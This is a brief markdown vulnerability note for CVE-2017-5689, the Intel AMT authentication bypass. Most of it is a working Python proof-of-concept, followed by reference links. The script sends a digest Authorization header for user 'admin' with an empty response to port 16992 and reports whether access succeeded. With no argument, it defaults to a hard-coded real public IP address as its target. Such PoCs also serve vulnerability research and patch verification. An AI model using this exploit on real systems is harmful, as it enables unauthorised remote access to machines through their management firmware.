CVE-2017-5689.md

CVE-2017-5689

• Report: March 2017
• Credit: Maksim Malyutin from Embedi

PoC

#!/usr/bin/env python
import requests
import sys

if len(sys.argv) > 1:
   ip = str(sys.argv[1])
else:
   ip = '168.235.84.117'

url = 'http://'+ip+':16992/index.htm'
req = requests.get(url)
auth = req.headers['WWW-Authenticate']
words = auth.split('"')
headers = 'Digest username= "admin", realm="'+words[1]+'", nonce="'+words[3]+'", uri="index.htm", response="", qop="auth", nc="00000001", cnonce="8858482c60513ab5" '
poc = requests.get(url, headers={'Authorization': headers})
if poc.status_code == 200:
   print('Success')
else:
   print('Failed')

Reference

• Mitigating CVE-2017-5689, an Intel Management Engine Vulnerability
• Explained — How Intel AMT Vulnerability Allows to Hack Computers Remotely
• http-vuln-cve2017-5689 NSE Script
• simple python poc for CVE-2017-5689
• CVE-2017-5689